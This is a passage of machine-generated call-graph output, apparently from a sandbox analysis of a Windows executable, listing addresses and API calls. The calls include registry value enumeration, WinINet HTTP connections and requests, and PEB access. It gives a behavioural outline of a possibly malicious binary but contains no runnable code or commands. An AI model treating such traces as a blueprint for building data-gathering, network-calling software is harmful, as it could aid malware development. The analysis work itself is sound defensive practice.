shared_ptr 14006->14007 14268 9091a0 14006->14268 14007->13839 14009 907896 14008->14009 14010 90789d 14009->14010 14011 9078f1 14009->14011 14012 9078d2 14009->14012 14010->13856 14015 90d312 RtlAllocateHeap 14011->14015 14018 9078df __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 14011->14018 14013 907929 14012->14013 14014 9078d9 14012->14014 14016 8f2440 RtlAllocateHeap 14013->14016 14017 90d312 RtlAllocateHeap 14014->14017 14015->14018 14016->14018 14017->14018 14018->13856 14292 8f5850 14019->14292 14023 8f5b7a 14311 8f4af0 14023->14311 14025 8f5b8b shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14025->13870 14027 928994 14026->14027 14337 9286d7 14027->14337 14029 902265 14029->13873 14029->13887 14433 9265a2 14030->14433 14032 90267a 14032->13924 14033 9266e7 14032->14033 14034 9266f3 __cftof 14033->14034 14036 9266fd __cftof __dosmaperr 14034->14036 14449 926670 14034->14449 14036->13929 14472 9085b0 14037->14472 14039 8f77c1 14040 908250 RtlAllocateHeap 14039->14040 14041 8f77d3 14040->14041 14042 907870 RtlAllocateHeap 14041->14042 14043 8f7831 14042->14043 14044 907870 RtlAllocateHeap 14043->14044 14045 8f784c 14044->14045 14046 8f5b20 RtlAllocateHeap 14045->14046 14047 8f7853 14046->14047 14048 907f30 RtlAllocateHeap 14047->14048 14049 8f7876 shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14048->14049 14049->13950 14051 907870 RtlAllocateHeap 14050->14051 14052 8fe489 14051->14052 14053 8f5b20 RtlAllocateHeap 14052->14053 14054 8fe494 14053->14054 14055 907870 RtlAllocateHeap 14054->14055 14056 8fe4af 14055->14056 14057 8f5b20 RtlAllocateHeap 14056->14057 14058 8fe4ba 14057->14058 14511 9091b0 14058->14511 14060 8fe4cd 14061 908250 RtlAllocateHeap 14060->14061 14062 8fe50f 14061->14062 14516 908150 14062->14516 14064 8fe520 14065 908250 RtlAllocateHeap 14064->14065 14066 8fe531 14065->14066 14067 907870 RtlAllocateHeap 14066->14067 14068 8fe6de 14067->14068 14069 907870 RtlAllocateHeap 14068->14069 14070 8fe6f3 14069->14070 14071 907870 RtlAllocateHeap 14070->14071 14072 8fe705 14071->14072 14524 8fbd60 14072->14524 14074 8fe711 14075 907870 RtlAllocateHeap 14074->14075 14076 8fe726 14075->14076 14077 907870 RtlAllocateHeap 14076->14077 14078 8fe73e 14077->14078 14079 8f5b20 RtlAllocateHeap 14078->14079 14080 8fe745 14079->14080 14548 8f84b0 14080->14548 14082 8fe9a9 shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14082->13975 14083 8fe751 14083->14082 14084 907870 RtlAllocateHeap 14083->14084 14085 8fea29 14084->14085 14086 8f5b20 RtlAllocateHeap 14085->14086 14087 8fea31 14086->14087 14554 9082f0 14087->14554 14089 8fea46 14090 908150 RtlAllocateHeap 14089->14090 14091 8fea55 14090->14091 14092 907870 RtlAllocateHeap 14091->14092 14093 8fec70 14092->14093 14094 8f5b20 RtlAllocateHeap 14093->14094 14095 8fec78 14094->14095 14096 9082f0 RtlAllocateHeap 14095->14096 14097 8fec8d 14096->14097 14098 908150 RtlAllocateHeap 14097->14098 14101 8fec9c 14098->14101 14099 8ff5a9 shared_ptr 14099->13975 14100 907f30 RtlAllocateHeap 14100->14101 14101->14099 14101->14100 14102 8ff5db 14101->14102 14103 907870 RtlAllocateHeap 14102->14103 14104 8ff637 14103->14104 14105 8f5b20 RtlAllocateHeap 14104->14105 14106 8ff63e 14105->14106 14107 907870 RtlAllocateHeap 14106->14107 14108 8ff651 14107->14108 14109 907870 RtlAllocateHeap 14108->14109 14110 8ff666 14109->14110 14111 907870 RtlAllocateHeap 14110->14111 14112 8ff67b 14111->14112 14113 907870 RtlAllocateHeap 14112->14113 14114 8ff68d 14113->14114 14115 8fe440 7 API calls 14114->14115 14116 8ff696 14115->14116 14117 907f30 RtlAllocateHeap 14116->14117 14118 8ff6ba 14117->14118 14119 907870 RtlAllocateHeap 14118->14119 14120 8ff6ca 14119->14120 14121 907f30 RtlAllocateHeap 14120->14121 14122 8ff6e7 14121->14122 14123 907f30 RtlAllocateHeap 14122->14123 14125 8ff700 14123->14125 14124 8ff892 shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14124->13975 14125->14124 14126 907870 RtlAllocateHeap 14125->14126 14127 8ff914 14126->14127 14128 8f5b20 RtlAllocateHeap 14127->14128 14129 8ff91b 14128->14129 14130 907870 RtlAllocateHeap 14129->14130 14131 8ff92e 14130->14131 14132 907870 RtlAllocateHeap 14131->14132 14133 8ff943 14132->14133 14134 907870 RtlAllocateHeap 14133->14134 14135 8ff958 14134->14135 14136 907870 RtlAllocateHeap 14135->14136 14137 8ff96a 14136->14137 14138 8fe440 7 API calls 14137->14138 14140 8ff973 14138->14140 14139 8ffa45 shared_ptr 14139->13975 14140->14139 14141 907870 RtlAllocateHeap 14140->14141 14142 8ffab5 14141->14142 14562 8f94b0 14142->14562 14144 8ffac4 14577 8f9160 14144->14577 14146 8ffad3 14147 908250 RtlAllocateHeap 14146->14147 14148 8ffaeb 14147->14148 14148->14148 14149 907f30 RtlAllocateHeap 14148->14149 14150 8ffb9c 14149->14150 14151 907870 RtlAllocateHeap 14150->14151 14152 8ffbb7 14151->14152 14153 907870 RtlAllocateHeap 14152->14153 14154 8ffbc9 14153->14154 14155 926659 RtlAllocateHeap 14154->14155 14156 8ffbf1 14155->14156 14157 907870 RtlAllocateHeap 14156->14157 14158 9004e4 14157->14158 14159 8f5b20 RtlAllocateHeap 14158->14159 14160 9004eb 14159->14160 14161 907870 RtlAllocateHeap 14160->14161 14162 900501 14161->14162 14163 907870 RtlAllocateHeap 14162->14163 14164 900519 14163->14164 14165 907870 RtlAllocateHeap 14164->14165 14166 900531 14165->14166 14167 907870 RtlAllocateHeap 14166->14167 14168 900543 14167->14168 14169 8fe440 7 API calls 14168->14169 14171 90054c 14169->14171 14170 900790 shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14170->13975 14171->14170 14172 907870 RtlAllocateHeap 14171->14172 14173 900897 14172->14173 14174 8f5b20 RtlAllocateHeap 14173->14174 14175 90089e 14174->14175 14176 907870 RtlAllocateHeap 14175->14176 14177 9008b4 14176->14177 14178 907870 RtlAllocateHeap 14177->14178 14179 9008cc 14178->14179 14180 907870 RtlAllocateHeap 14179->14180 14181 9008e4 14180->14181 14182 907870 RtlAllocateHeap 14181->14182 14183 9011f0 14182->14183 14184 8fe440 7 API calls 14183->14184 14185 9011f9 14184->14185 14187 908269 14186->14187 14188 908e70 RtlAllocateHeap 14187->14188 14189 90827d 14187->14189 14188->14189 14189->13981 14191 908526 14190->14191 14191->14191 14192 90853b 14191->14192 14193 908e70 RtlAllocateHeap 14191->14193 14192->13983 14193->14192 14195 8f8a1a 14194->14195 14197 8f8908 shared_ptr 14194->14197 14195->13989 14196 907870 RtlAllocateHeap 14196->14197 14197->14195 14197->14196 14198 8f5b20 RtlAllocateHeap 14197->14198 14199 8f8a50 14197->14199 14200 907f30 RtlAllocateHeap 14197->14200 14198->14197 14201 908070 RtlAllocateHeap 14199->14201 14200->14197 14201->14195 14204 8f5e28 14202->14204 14203 8f5f0e shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14203->13880 14204->14203 14205 907f30 RtlAllocateHeap 14204->14205 14206 8f5f99 14205->14206 14207 907f30 RtlAllocateHeap 14206->14207 14208 8f5fcd 14207->14208 14209 907f30 RtlAllocateHeap 14208->14209 14210 8f5ffe 14209->14210 14211 907f30 RtlAllocateHeap 14210->14211 14212 8f602f 14211->14212 14213 907f30 RtlAllocateHeap 14212->14213 14214 8f6060 RegOpenKeyExA 14213->14214 14215 8f645a shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14214->14215 14219 8f60b3 __cftof 14214->14219 14215->13880 14216 8f6153 RegEnumValueW 14216->14219 14219->14215 14219->14216 14220 907870 RtlAllocateHeap 14219->14220 14604 907c50 14219->14604 14617 908090 14219->14617 14220->14219 14222 8f8cb0 14221->14222 14223 907870 RtlAllocateHeap 14222->14223 14224 8f8cbf 14223->14224 14225 8f5b20 RtlAllocateHeap 14224->14225 14226 8f8cca 14225->14226 14227 907f30 RtlAllocateHeap 14226->14227 14228 8f8d1c 14227->14228 14229 908150 RtlAllocateHeap 14228->14229 14230 8f8d2e shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14229->14230 14230->13935 14232 8f8fb0 14231->14232 14233 907870 RtlAllocateHeap 14232->14233 14234 8f8fbf 14233->14234 14235 8f5b20 RtlAllocateHeap 14234->14235 14236 8f8fca 14235->14236 14236->14236 14237 907f30 RtlAllocateHeap 14236->14237 14238 8f901c 14237->14238 14239 908150 RtlAllocateHeap 14238->14239 14240 8f902e shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14239->14240 14240->13935 14242 8f8e2f 14241->14242 14243 907870 RtlAllocateHeap 14242->14243 14244 8f8e3f 14243->14244 14245 8f5b20 RtlAllocateHeap 14244->14245 14246 8f8e4a 14245->14246 14247 907f30 RtlAllocateHeap 14246->14247 14248 8f8e9c 14247->14248 14249 908150 RtlAllocateHeap 14248->14249 14250 8f8eae shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14249->14250 14250->13935 14252 90c109 RtlAllocateHeap 14251->14252 14253 90807a 14252->14253 14253->13859 14634 90c019 14254->14634 14256 90c0da std::_Throw_future_error 14637 90c08d 14257->14637 14259 90c11a std::_Throw_future_error 14263 90d317 __cftof 14260->14263 14262 90d331 14262->14006 14263->14262 14264 8f2440 std::_Throw_future_error 14263->14264 14275 928aa4 14263->14275 14267 90d33d std::_Throw_future_error 14264->14267 14279 9237dc 14264->14279 14266 8f2483 14266->14006 14267->14006 14283 90c0e9 14268->14283 14272 8f244e std::_Throw_future_error 14271->14272 14273 9237dc ___std_exception_copy RtlAllocateHeap 14272->14273 14274 8f2483 14273->14274 14278 92af0b __cftof 14275->14278 14276 92af34 RtlAllocateHeap 14277 92af47 __dosmaperr 14276->14277 14276->14278 14277->14263 14278->14276 14278->14277 14280 9237e9 14279->14280 14282 923806 ___std_exception_destroy ___std_exception_copy 14279->14282 14281 928aa4 ___std_exception_copy RtlAllocateHeap 14280->14281 14280->14282 14281->14282 14282->14266 14286 90c053 14283->14286 14285 90c0fa std::_Throw_future_error 14289 8f22a0 14286->14289 14288 90c065 14288->14285 14290 9237dc ___std_exception_copy RtlAllocateHeap 14289->14290 14291 8f22d7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14290->14291 14291->14288 14318 907df0 14292->14318 14294 8f587b 14295 8f58f0 14294->14295 14296 907df0 RtlAllocateHeap 14295->14296 14309 8f5955 14296->14309 14297 907870 RtlAllocateHeap 14297->14309 14298 8f5aed __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14298->14023 14299 8f5b19 14300 908070 RtlAllocateHeap 14299->14300 14302 8f5b1e 14300->14302 14301 907f30 RtlAllocateHeap 14301->14309 14304 8f5850 RtlAllocateHeap 14302->14304 14305 8f5b64 14304->14305 14306 8f58f0 RtlAllocateHeap 14305->14306 14307 8f5b7a 14306->14307 14308 8f4af0 RtlAllocateHeap 14307->14308 14310 8f5b8b shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14308->14310 14309->14297 14309->14298 14309->14299 14309->14301 14331 8f5640 14309->14331 14310->14023 14312 8f4b4e 14311->14312 14313 8f4b24 14311->14313 14316 907df0 RtlAllocateHeap 14312->14316 14314 907f30 RtlAllocateHeap 14313->14314 14315 8f4b3b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14314->14315 14315->14025 14317 8f4bab __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14316->14317 14317->14025 14320 907e0e __cftof 14318->14320 14322 907e37 14318->14322 14319 9091a0 RtlAllocateHeap 14321 907f28 14319->14321 14320->14294 14323 8f2440 RtlAllocateHeap 14321->14323 14324 907eae 14322->14324 14326 907e8b 14322->14326 14329 907e9c __cftof 14322->14329 14325 907f2d 14323->14325 14328 90d312 RtlAllocateHeap 14324->14328 14324->14329 14326->14321 14327 90d312 RtlAllocateHeap 14326->14327 14327->14329 14328->14329 14329->14319 14330 907f05 shared_ptr 14329->14330 14330->14294 14335 8f5770 shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14331->14335 14336 8f56a9 shared_ptr 14331->14336 14332 8f583a 14334 908070 RtlAllocateHeap 14332->14334 14333 907f30 RtlAllocateHeap 14333->14336 14334->14335 14335->14309 14336->14332 14336->14333 14336->14335 14338 9286e9 14337->14338 14342 9286fe __cftof __dosmaperr 14338->14342 14343 92683a 14338->14343 14341 92872e 14341->14342 14349 928925 14341->14349 14342->14029 14344 92685a 14343->14344 14345 926851 14343->14345 14344->14345 14355 92b4bb 14344->14355 14345->14341 14350 928962 14349->14350 14352 928932 14349->14352 14420 92d2e9 14350->14420 14353 928941 __fassign 14352->14353 14415 92d30d 14352->14415 14353->14341 14356 926890 14355->14356 14357 92b4ce 14355->14357 14359 92b4e8 14356->14359 14357->14356 14363 92f46b 14357->14363 14360 92b510 14359->14360 14361 92b4fb 14359->14361 14360->14345 14361->14360 14398 92e571 14361->14398 14365 92f477 __cftof 14363->14365 14364 92f4c6 14364->14356 14365->14364 14368 928aaf 14365->14368 14367 92f4eb 14369 928ab4 __cftof 14368->14369 14372 928abf __cftof 14369->14372 14379 92d4f4 14369->14379 14376 92651d 14372->14376 14373 92d727 RtlAllocateHeap 14374 92d73a __dosmaperr 14373->14374 14375 928af2 __cftof 14373->14375 14374->14367 14375->14373 14375->14374 14386 9263f7 14376->14386 14381 92d500 __cftof 14379->14381 14380 92d55c __cftof __dosmaperr 14380->14372 14381->14380 14382 92651d __cftof 2 API calls 14381->14382 14385 92d6ee __cftof 14382->14385 14383 92d727 RtlAllocateHeap 14384 92d73a __dosmaperr 14383->14384 14383->14385 14384->14372 14385->14383 14385->14384 14387 926405 __cftof 14386->14387 14388 926450 14387->14388 14391 92645b 14387->14391 14388->14375 14396 92a1c2 GetPEB 14391->14396 14393 926465 14394 92646a GetPEB 14393->14394 14395 92647a __cftof 14393->14395 14394->14395 14397 92a1dc __cftof 14396->14397 14397->14393 14399 92e57b 14398->14399 14402 92e489 14399->14402 14401 92e581 14401->14360 14406 92e495 __cftof __freea 14402->14406 14403 92e4b6 14403->14401 14404 928aaf __cftof 4 API calls 14405 92e528 14404->14405 14407 92e564 14405->14407 14411 92a5ee 14405->14411 14406->14403 14406->14404 14407->14401 14412 92a611 14411->14412 14413 928aaf __cftof 4 API calls 14412->14413 14414 92a687 14413->14414 14416 92683a __cftof 5 API calls 14415->14416 14417 92d32a 14416->14417 14419 92d33a __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14417->14419 14424 92f07f 14417->14424 14419->14353 14421 92d2f4 14420->14421 14422 92b4bb __cftof 4 API calls 14421->14422 14423 92d304 14422->14423 14423->14353 14425 92683a __cftof 5 API calls 14424->14425 14426 92f09f __fassign 14425->14426 14428 92f0f2 __cftof __fassign __freea __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14426->14428 14429 92af0b 14426->14429 14428->14419 14431 92af47 __dosmaperr 14429->14431 14432 92af19 __cftof 14429->14432 14430 92af34 RtlAllocateHeap 14430->14431 14430->14432 14431->14428 14432->14430 14432->14431 14434 9265ae __cftof 14433->14434 14435 9265b5 __cftof __dosmaperr 14434->14435 14437 92a783 14434->14437 14435->14032 14438 92a78f __cftof 14437->14438 14441 92a827 14438->14441 14440 92a7aa 14440->14435 14443 92a84a 14441->14443 14443->14443 14444 92a890 __freea 14443->14444 14445 92d6ef 14443->14445 14444->14440 14446 92d6fc __cftof 14445->14446 14447 92d727 RtlAllocateHeap 14446->14447 14448 92d73a __dosmaperr 14446->14448 14447->14446 14447->14448 14448->14444 14450 926692 14449->14450 14452 92667d __cftof __dosmaperr __freea 14449->14452 14450->14452 14453 929ef9 14450->14453 14452->14036 14454 929f36 14453->14454 14455 929f11 14453->14455 14454->14452 14455->14454 14457 9302f8 14455->14457 14458 930304 __cftof 14457->14458 14460 93030c __cftof __dosmaperr 14458->14460 14461 9303ea 14458->14461 14460->14454 14462 93040c 14461->14462 14464 930410 __cftof __dosmaperr 14461->14464 14462->14464 14465 92fb7f 14462->14465 14464->14460 14466 92fbcc 14465->14466 14467 92683a __cftof 5 API calls 14466->14467 14471 92fbdb __cftof 14467->14471 14468 92d2e9 4 API calls 14468->14471 14469 92fe7b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14469->14464 14470 92c4ea 5 API calls __fassign 14470->14471 14471->14468 14471->14469 14471->14470 14473 908610 14472->14473 14473->14473 14481 9075d0 14473->14481 14475 908629 14477 908644 14475->14477 14493 908e70 14475->14493 14478 908e70 RtlAllocateHeap 14477->14478 14480 908699 14477->14480 14479 9086e1 14478->14479 14479->14039 14480->14039 14483 9075eb 14481->14483 14492 9076d4 shared_ptr 14481->14492 14482 90766b 14484 9091a0 RtlAllocateHeap 14482->14484 14482->14492 14483->14482 14488 90765a 14483->14488 14489 907681 14483->14489 14483->14492 14485 907766 14484->14485 14486 8f2440 RtlAllocateHeap 14485->14486 14487 90776b 14486->14487 14488->14485 14491 90d312 RtlAllocateHeap 14488->14491 14489->14482 14490 90d312 RtlAllocateHeap 14489->14490 14490->14482 14491->14482 14492->14475 14494 908fbe 14493->14494 14497 908e9b 14493->14497 14495 9091a0 RtlAllocateHeap 14494->14495 14496 908fc3 14495->14496 14498 8f2440 RtlAllocateHeap 14496->14498 14499 908ee2 14497->14499 14500 908f0c 14497->14500 14504 908ef3 14498->14504 14499->14496 14501 908eed 14499->14501 14503 90d312 RtlAllocateHeap 14500->14503 14500->14504 14502 90d312 RtlAllocateHeap 14501->14502 14502->14504 14503->14504 14505 908fe8 14504->14505 14507 8f2440 std::_Throw_future_error 14504->14507 14508 908f7c shared_ptr 14504->14508 14506 90d312 RtlAllocateHeap 14505->14506 14506->14508 14509 9237dc ___std_exception_copy RtlAllocateHeap 14507->14509 14508->14477 14510 8f2483 14509->14510 14510->14477 14512 9091c4 14511->14512 14515 9091d5 14512->14515 14592 909410 14512->14592 14514 90925b 14514->14060 14515->14060 14517 9081c2 14516->14517 14518 908178 14516->14518 14521 9081d1 14517->14521 14523 908e70 RtlAllocateHeap 14517->14523 14518->14517 14519 908181 14518->14519 14520 9091b0 RtlAllocateHeap 14519->14520 14522 90818a 14520->14522 14521->14064 14522->14064 14523->14521 14525 8fbdb2 14524->14525 14526 8fc1a1 14524->14526 14525->14526 14528 8fbdc6 InternetOpenW InternetConnectA 14525->14528 14527 907f30 RtlAllocateHeap 14526->14527 14533 8fc14e shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14527->14533 14529 907870 RtlAllocateHeap 14528->14529 14530 8fbe3d 14529->14530 14531 8f5b20 RtlAllocateHeap 14530->14531 14532 8fbe48 HttpOpenRequestA 14531->14532 14537 8fbe71 shared_ptr 14532->14537 14533->14074 14535 907870 RtlAllocateHeap 14536 8fbed9 14535->14536 14538 8f5b20 RtlAllocateHeap 14536->14538 14537->14535 14539 8fbee4 14538->14539 14540 907870 RtlAllocateHeap 14539->14540 14541 8fbefd 14540->14541 14542 8f5b20 RtlAllocateHeap 14541->14542 14543 8fbf08 HttpSendRequestA 14542->14543 14546 8fbf2b shared_ptr 14543->14546 14545 8fbfb3 InternetReadFile 14547 8fbfda 14545->14547 14546->14545 14552 8f85d0 shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14548->14552 14553 8f8505 shared_ptr 14548->14553 14549 8f8697 14551 908070 RtlAllocateHeap 14549->14551 14550 907f30 RtlAllocateHeap 14550->14553 14551->14552 14552->14083 14553->14549 14553->14550 14553->14552 14555 9075d0 RtlAllocateHeap 14554->14555 14556 908369 14555->14556 14557 908e70 RtlAllocateHeap 14556->14557 14558 908384 14556->14558 14557->14558 14559 908e70 RtlAllocateHeap 14558->14559 14561 9083d8 14558->14561 14560 90841e 14559->14560 14560->14089 14561->14089 14563 8f9504 14562->14563 14564 907f30 RtlAllocateHeap 14563->14564 14565 8f954c 14564->14565 14566 907870 RtlAllocateHeap 14565->14566 14576 8f9565 shared_ptr 14566->14576 14567 8f96cf 14569 8f972e 14567->14569 14570 8f9810 14567->14570 14568 907870 RtlAllocateHeap 14568->14576 14573 907f30 RtlAllocateHeap 14569->14573 14571 908070 RtlAllocateHeap 14570->14571 14574 8f9764 shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14571->14574 14572 8f5b20 RtlAllocateHeap 14572->14576 14573->14574 14574->14144 14575 907f30 RtlAllocateHeap 14575->14576 14576->14567 14576->14568 14576->14570 14576->14572 14576->14574 14576->14575 14578 8f91b4 14577->14578 14579 907f30 RtlAllocateHeap 14578->14579 14580 8f91fc 14579->14580 14581 907870 RtlAllocateHeap 14580->14581 14582 8f9215 shared_ptr 14581->14582 14583 8f937f 14582->14583 14584 907870 RtlAllocateHeap 14582->14584 14586 8f5b20 RtlAllocateHeap 14582->14586 14588 8f93f6 shared_ptr 14582->14588 14590 907f30 RtlAllocateHeap 14582->14590 14585 907f30 RtlAllocateHeap 14583->14585 14584->14582 14585->14588 14586->14582 14587 8f9473 shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 14587->14146 14588->14587 14589 908070 RtlAllocateHeap 14588->14589 14591 8f94a8 14589->14591 14590->14582 14593 909549 14592->14593 14595 90943b 14592->14595 14594 9091a0 RtlAllocateHeap 14593->14594 14596 90954e 14594->14596 14598 909482 14595->14598 14599 9094a9 14595->14599 14597 8f2440 RtlAllocateHeap 14596->14597 14603 909493 shared_ptr 14597->14603 14598->14596 14600 90948d 14598->14600 14602 90d312 RtlAllocateHeap 14599->14602 14599->14603 14601 90d312 RtlAllocateHeap 14600->14601 14601->14603 14602->14603 14603->14514 14607 907c71 14604->14607 14608 907c9c 14604->14608 14605 907d90 14606 9091a0 RtlAllocateHeap 14605->14606 14616 907d01 shared_ptr 14606->14616 14607->14219 14608->14605 14609 907d8b 14608->14609 14611 907cf0 14608->14611 14612 907d17 14608->14612 14610 8f2440 RtlAllocateHeap 14609->14610 14610->14605 14611->14609 14613 907cfb 14611->14613 14614 90d312 RtlAllocateHeap 14612->14614 14612->14616 14615 90d312 RtlAllocateHeap 14613->14615 14614->14616 14615->14616 14616->14219 14618 9075d0 RtlAllocateHeap 14617->14618 14620 9080e0 14618->14620 14619 908132 14619->14219 14620->14619 14622 908bd0 14620->14622 14623 908bf3 14622->14623 14624 908cf9 14622->14624 14627 908c35 14623->14627 14628 908c5f 14623->14628 14625 9091a0 RtlAllocateHeap 14624->14625 14626 908cfe 14625->14626 14629 8f2440 RtlAllocateHeap 14626->14629 14627->14626 14630 908c40 14627->14630 14632 90d312 RtlAllocateHeap 14628->14632 14633 908c46 shared_ptr 14628->14633 14629->14633 14631 90d312 RtlAllocateHeap 14630->14631 14631->14633 14632->14633 14633->14620 14635 8f22a0 std::invalid_argument::invalid_argument RtlAllocateHeap 14634->14635 14636 90c02b 14635->14636 14636->14256 14638 8f22a0 std::invalid_argument::invalid_argument RtlAllocateHeap 14637->14638 14639 90c09f 14638->14639 14639->14259 15770 90b85e 15775 90b6e5 15770->15775 15772 90b886 15783 90b648 15772->15783 15774 90b89f 15776 90b6f1 Concurrency::details::_Reschedule_chore 15775->15776 15778 90b722 15776->15778 15793 90c5dc 15776->15793 15778->15772 15781 90b70c __Mtx_unlock 15782 8f2ad0 12 API calls 15781->15782 15782->15778 15784 90b654 Concurrency::details::_Reschedule_chore 15783->15784 15785 90b6ae 15784->15785 15786 90c5dc GetSystemTimePreciseAsFileTime 15784->15786 15785->15774 15787 90b669 15786->15787 15788 8f2ad0 12 API calls 15787->15788 15789 90b66f __Mtx_unlock 15788->15789 15790 8f2ad0 12 API calls 15789->15790 15791 90b68c __Cnd_broadcast 15790->15791 15791->15785 15792 8f2ad0 12 API calls 15791->15792 15792->15785 15803 90c382 15793->15803 15795 90b706 15796 8f2ad0 15795->15796 15797 8f2adc 15796->15797 15798 8f2ada 15796->15798 15820 90c19a 15797->15820 15798->15781 15804 90c3d8 15803->15804 15806 90c3aa __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 15803->15806 15804->15806 15809 90ce9b 15804->15809 15806->15795 15807 90c42d __Xtime_diff_to_millis2 15807->15806 15808 90ce9b _xtime_get GetSystemTimePreciseAsFileTime 15807->15808 15808->15807 15810 90ceb7 __aulldvrm 15809->15810 15811 90ceaa 15809->15811 15810->15807 15811->15810 15813 90ce74 15811->15813 15816 90cb1a 15813->15816 15817 90cb37 15816->15817 15818 90cb2b GetSystemTimePreciseAsFileTime 15816->15818 15817->15810 15818->15817 15821 90c1c2 15820->15821 15822 90c1a4 15820->15822 15821->15821 15822->15821 15824 90c1c7 15822->15824 15829 8f2aa0 15824->15829 15826 90c1de 15845 90c12f 15826->15845 15828 90c1ef std::_Throw_future_error 15828->15822 15851 90be0f 15829->15851 15831 8f2abf 15831->15826 15832 928aaf __cftof 4 API calls 15833 926c26 15832->15833 15834 926c43 15833->15834 15835 926c35 15833->15835 15837 9268bd 5 API calls 15834->15837 15836 926c99 11 API calls 15835->15836 15840 926c3f 15836->15840 15838 926c5d 15837->15838 15841 92681d RtlAllocateHeap 15838->15841 15839 8f2ab4 __cftof 15839->15831 15839->15832 15840->15826 15842 926c6a 15841->15842 15843 926c99 11 API calls 15842->15843 15844 926c71 __freea 15842->15844 15843->15844 15844->15826 15846 90c13b __EH_prolog3_GS 15845->15846 15847 907f30 RtlAllocateHeap 15846->15847 15848 90c16d 15847->15848 15858 8f2670 15848->15858 15850 90c182 15850->15828 15854 90cb61 15851->15854 15855 90cb6f InitOnceExecuteOnce 15854->15855 15857 90be22 15854->15857 15855->15857 15857->15839 15859 907870 RtlAllocateHeap 15858->15859 15860 8f26c2 15859->15860 15861 8f26e5 15860->15861 15862 908e70 RtlAllocateHeap 15860->15862 15863 908e70 RtlAllocateHeap 15861->15863 15865 8f274e shared_ptr 15861->15865 15862->15861 15863->15865 15864 9237dc ___std_exception_copy RtlAllocateHeap 15866 8f280b shared_ptr ___std_exception_destroy __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 15864->15866 15865->15864 15865->15866 15866->15850 15905 908700 15906 90d312 RtlAllocateHeap 15905->15906 15907 90875a __cftof 15906->15907 15915 909ae0 15907->15915 15909 908784 15913 90879c __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 15909->15913 15919 8f43b0 15909->15919 15914 90880f 15916 909b15 15915->15916 15928 8f2ca0 15916->15928 15918 909b46 15918->15909 15920 90be0f InitOnceExecuteOnce 15919->15920 15921 8f43ca 15920->15921 15922 8f43d1 15921->15922 15923 926beb 11 API calls 15921->15923 15925 90bd80 15922->15925 15924 8f43e4 15923->15924 15982 90bcbb 15925->15982 15927 90bd96 std::_Throw_future_error 15927->15914 15929 8f2cdd 15928->15929 15930 90be0f InitOnceExecuteOnce 15929->15930 15931 8f2d06 15930->15931 15932 8f2d11 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 15931->15932 15933 8f2d48 15931->15933 15937 90be27 15931->15937 15932->15918 15946 8f2400 15933->15946 15938 90be33 15937->15938 15949 8f28c0 15938->15949 15940 90be53 std::_Throw_future_error 15941 90bea3 15940->15941 15942 90be9a 15940->15942 15944 8f2aa0 12 API calls 15941->15944 15957 90bdaf 15942->15957 15945 90be9f 15944->15945 15945->15933 15977 90b506 15946->15977 15948 8f2432 15950 907f30 RtlAllocateHeap 15949->15950 15951 8f290f 15950->15951 15952 8f2670 RtlAllocateHeap 15951->15952 15954 8f2927 15952->15954 15953 8f294d shared_ptr 15953->15940 15954->15953 15955 9237dc ___std_exception_copy RtlAllocateHeap 15954->15955 15956 8f29a4 15955->15956 15956->15940 15958 90cb61 InitOnceExecuteOnce 15957->15958 15959 90bdc7 15958->15959 15960 90bdce 15959->15960 15963 926beb 15959->15963 15960->15945 15962 90bdd7 15962->15945 15964 926bf7 __cftof 15963->15964 15965 928aaf __cftof 4 API calls 15964->15965 15966 926c26 15965->15966 15967 926c43 15966->15967 15968 926c35 15966->15968 15970 9268bd 5 API calls 15967->15970 15969 926c99 11 API calls 15968->15969 15972 926c3f 15969->15972 15971 926c5d 15970->15971 15973 92681d RtlAllocateHeap 15971->15973 15972->15962 15974 926c6a 15973->15974 15975 926c99 11 API calls 15974->15975 15976 926c71 __freea 15974->15976 15975->15976 15976->15962 15979 90b521 std::_Throw_future_error 15977->15979 15978 90b588 __cftof __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 15978->15948 15979->15978 15980 928aaf __cftof 4 API calls 15979->15980 15981 90b5cf 15980->15981 15983 8f22a0 std::invalid_argument::invalid_argument RtlAllocateHeap 15982->15983 15984 90bccf 15983->15984 15984->15927 14640 926beb 14641 926bf7 __cftof 14640->14641 14642 928aaf __cftof 4 API calls 14641->14642 14643 926c26 14642->14643 14644 926c43 14643->14644 14645 926c35 14643->14645 14654 9268bd 14644->14654 14646 926c99 11 API calls 14645->14646 14649 926c3f 14646->14649 14648 926c5d 14657 92681d 14648->14657 14653 926c71 __freea 14655 